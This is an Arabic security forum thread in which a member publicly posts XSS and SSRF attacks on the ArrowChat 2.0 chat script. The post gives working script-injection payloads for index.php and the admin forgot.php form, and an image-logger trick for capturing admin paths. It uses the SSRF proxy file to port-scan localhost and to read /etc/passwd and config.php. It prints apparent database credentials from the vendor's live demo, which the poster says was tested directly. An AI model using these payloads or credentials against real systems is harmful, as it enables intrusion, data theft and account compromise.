TO DONATE : BTC => 1BU6R1C4AQ77LjLZswQNKFwAupw61i88Kn || PM => U4089661


اهم قوانين :1- منع الردود الباهتة مثل شكرااااا و أخواتها 2- لا يسمح بالمشاحنات الطائفية باآ شكل من الأشكال 3- عدم استعمال الألفاظ التافهة و الكلام البذىء 4- عدم وضع معرفات التواصل الأجتماعى بالردود 5- الأطلاع على كامل القوانين واجب 


العودة   الحماية للأبد -Security 4 Ever > قسم الحماية - Security section > قسم جديد الثغرات > قسم جديد ثغرات الأعضاء

قسم جديد ثغرات الأعضاء يختص بجديد ثغرات الأعضاء

 
أدوات الموضوع انواع عرض الموضوع
  #1  
قديم 07-10-2019, 10:38 PM
الصورة الرمزية alzher
alzher
:: عضو خاص ::
 
حـالة التــواجـد : alzher غير متواجد حالياً
تاريخ التسجيل: Jul 2011
الجــــنــــــس: ذكـر
المشاركات: 520
شكراً:2,021
تم شكره 2,274 مرة في 372 مشاركة
معدل تقييم المستوى: 9
alzher على طريق التميز
افتراضي SSRF (read internal files)+ XSS arrowchat 2.0

\

السلام عليكم ورحمه الله وبركاته ..

\

الأب الروحي للمنتدى نسيم حب يحط سكربت شات للمنتدى اسمه arrowchat اول ما شفت السكربت ..

رحت ادور نسخه منزوعه بقوقل حصلت نسخه قديمه .. فقلت مالي الا افحص على موقع الشركة نفسها بما انها مركبه نسخه ديمو محدثه اخر اصدار ..


\

https://www.arrowchat.com

\

xss

الاصابه الاولى في ملف index.php

الاصدار رقم 1.0

كود PHP:
127.0.0.1/vb/arrowchat/public/video/index.php?rid=</s cript><s cript>al ert(xss);</sc ript


استغلال نفس الملف في الاصدار رقم 2.0

كود PHP:
https://www.site.com/arrowchat//public/video/index.php?rid="></ifra me><sc ript>ale rt(d ocument.dom ain)</sc ipt> 
الاصابه الثانيه رقم الاصدار 2.0 في ملف arrowchat/admin/forgot.php

https://www.arrowchat.com/demo.admin...min/forgot.php

نضع في خانه استعاده الايميل ..

كود PHP:
 "<xss><S cRiPt >a lert(1)</S cRiPt> 


\

ssrf

الاصابه الاولى .. اثناء المحادثه .. لاحظت ان الموقع يسمح لك بأرسال صور في الشات .. فقلت
what if i put my own logger image

نلاحظ ان المتغير message يرسل رابط صوره وتظهر للمستخدم .. تم تغير الرابط الى لوقر بصوره ..



نشوف النتايج ..



\

الاصابه الاخرى .. في ملف arrowchat/admin/includes/functions/functions_proxy_rss.php

نجرب

https://www.arrowchat.com/demo.admin...//127.0.0.1:21

بحيث كل ما تغير البورت يعطيك ريسبون بالبنر حقه واذا مو موجود يعطيك صفحه فاضيه ..



\

لقراءة ملفات السيرفر مع احترام المسار ..

https://www.arrowchat.com/demo.admin...:///etc/passwd





لقراءة ملف الكونفيج ..

https://www.arrowchat.com/demo.admin...des/config.php


كود PHP:
     define('DB_SERVER','localhost');      define('DB_USERNAME','stackman_admin');      define('DB_PASSWORD','jTu46g_7');      define('DB_NAME','stackman_demoadmin'); 
\


\


طبعا لو فرضنا ان ملف الادمن مخفي مثل حالة شات منتدانا سابقاً .. نرسل لوقر على الشات العام ومتى ما دخل الادمن من اللوحه راح يبين مساره باللوقر ..



\


في امان الله  
الصور المصغرة للصور المرفقة
اضغط على الصورة لعرض أكبر

الاســـم:	index.jpg‏
المشاهدات:	266
الحجـــم:	29.6 كيلوبايت
الرقم:	2829   اضغط على الصورة لعرض أكبر

الاســـم:	frogetxss.jpg‏
المشاهدات:	258
الحجـــم:	37.2 كيلوبايت
الرقم:	2830   اضغط على الصورة لعرض أكبر

الاســـم:	ssrf1send.jpg‏
المشاهدات:	259
الحجـــم:	74.4 كيلوبايت
الرقم:	2831   اضغط على الصورة لعرض أكبر

الاســـم:	ssrf1send2.jpg‏
المشاهدات:	260
الحجـــم:	92.2 كيلوبايت
الرقم:	2832   اضغط على الصورة لعرض أكبر

الاســـم:	ssrfpass.jpg‏
المشاهدات:	257
الحجـــم:	41.8 كيلوبايت
الرقم:	2833  

اضغط على الصورة لعرض أكبر

الاســـم:	ssrfpass2.jpg‏
المشاهدات:	264
الحجـــم:	98.0 كيلوبايت
الرقم:	2834  

 

 

●○●○●○●○●○●○
qJJI Jgω∫ ɔρζρ qJJIƔI qJIƔ

(لا يغلب عسراً يسرين)ّ
●○●○●○●○●○●○
ألزم الصمــت - واحتسب عند الرب - فلكل بــداية - [نهــاية] !؟
AlZh3r
●○●○●○
أإأدعــولي بالتــوفيق و لوالديّ

●○●○●○
رد مع اقتباس
25 أعضاء قالوا شكراً لـ alzher على المشاركة المفيدة:
  #2  
قديم 08-10-2019, 04:30 AM
الصورة الرمزية Sec4ever
Sec4ever
الحماية للأبد
 
حـالة التــواجـد : Sec4ever غير متواجد حالياً
تاريخ التسجيل: Oct 2009
مكـان الإقامـة : الحماية للأبد
الجــــنــــــس: ذكـر
الــهـــوايـــــة: النـــــــــوم :)
المشاركات: 3,744
شكراً:3,331
تم شكره 5,070 مرة في 917 مشاركة
معدل تقييم المستوى: 10
Sec4ever تم تعطيل التقييم
افتراضي رد: SSRF (read internal files)+ XSS arrowchat 2.0

شغل لوز يا alzher .
راح اعقب على الموضوع و اذا شايف ان الموضوع فيه معلومات حساسة حاول تحولوا على القسم الخاص لحين ما يعلق الاغلب على تاثير الموضوع .  

 

 

My Adversary completes me,
to disrespect him is to disrespect myself,
thanks to his presence.
رد مع اقتباس
2 أعضاء قالوا شكراً لـ Sec4ever على المشاركة المفيدة:
  #3  
قديم 08-10-2019, 07:35 AM
الصورة الرمزية alzher
alzher
:: عضو خاص ::
 
حـالة التــواجـد : alzher غير متواجد حالياً
تاريخ التسجيل: Jul 2011
الجــــنــــــس: ذكـر
المشاركات: 520
شكراً:2,021
تم شكره 2,274 مرة في 372 مشاركة
معدل تقييم المستوى: 9
alzher على طريق التميز
افتراضي رد: SSRF (read internal files)+ XSS arrowchat 2.0

اقتباس:
المشاركة الأصلية كتبت بواسطة Sec4ever مشاهدة المشاركة

شغل لوز يا alzher .
راح اعقب على الموضوع و اذا شايف ان الموضوع فيه معلومات حساسة حاول تحولوا على القسم الخاص لحين ما يعلق الاغلب على تاثير الموضوع .



\


الوضع في السليم .. بالنسبة للوقر الشات .. قد جربته على شات المنتدى ولا ضبط .. اعتقد يحتاج تفعيل الخاصيه بلوحة الادمن للسماح بها ..


ملف functions_proxy_rss.php خلف مجلد الادمن وهو مخفي سابقا بالموقع ..


و التجارب كانت على موقع الشركة الام ..



\


وصدقني لو فيه ضرر على الموقع راسلتك فيه قبل ما انزل الموضوع .. حمايه واستمرار المنتدى مسئوليه الجميع ..




في امان الله  

 

 

●○●○●○●○●○●○
qJJI Jgω∫ ɔρζρ qJJIƔI qJIƔ

(لا يغلب عسراً يسرين)ّ
●○●○●○●○●○●○
ألزم الصمــت - واحتسب عند الرب - فلكل بــداية - [نهــاية] !؟
AlZh3r
●○●○●○
أإأدعــولي بالتــوفيق و لوالديّ

●○●○●○
رد مع اقتباس
7 أعضاء قالوا شكراً لـ alzher على المشاركة المفيدة:
  #4  
قديم 11-10-2019, 08:38 PM
الصورة الرمزية Sec4ever
Sec4ever
الحماية للأبد
 
حـالة التــواجـد : Sec4ever غير متواجد حالياً
تاريخ التسجيل: Oct 2009
مكـان الإقامـة : الحماية للأبد
الجــــنــــــس: ذكـر
الــهـــوايـــــة: النـــــــــوم :)
المشاركات: 3,744
شكراً:3,331
تم شكره 5,070 مرة في 917 مشاركة
معدل تقييم المستوى: 10
Sec4ever تم تعطيل التقييم
افتراضي رد: SSRF (read internal files)+ XSS arrowchat 2.0

الشات فيه هفوات كثيرة على الرغم من امكانياته الرائعة . حتى دوال الحماية فيه بدائية جدا .
مزلت مع حمزة و دكتور محمد لكي يعملوا لنا حماية جيدة.
اي شئ اتمنى ان يتم ارساله .  

 

 

My Adversary completes me,
to disrespect him is to disrespect myself,
thanks to his presence.
رد مع اقتباس
2 أعضاء قالوا شكراً لـ Sec4ever على المشاركة المفيدة:


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
Joomla 1.5.12 read/exec remote files Sec4ever قسم جديد ثغرات مواقع الحماية 0 26-01-2010 05:34 PM


الساعة الآن 03:18 PM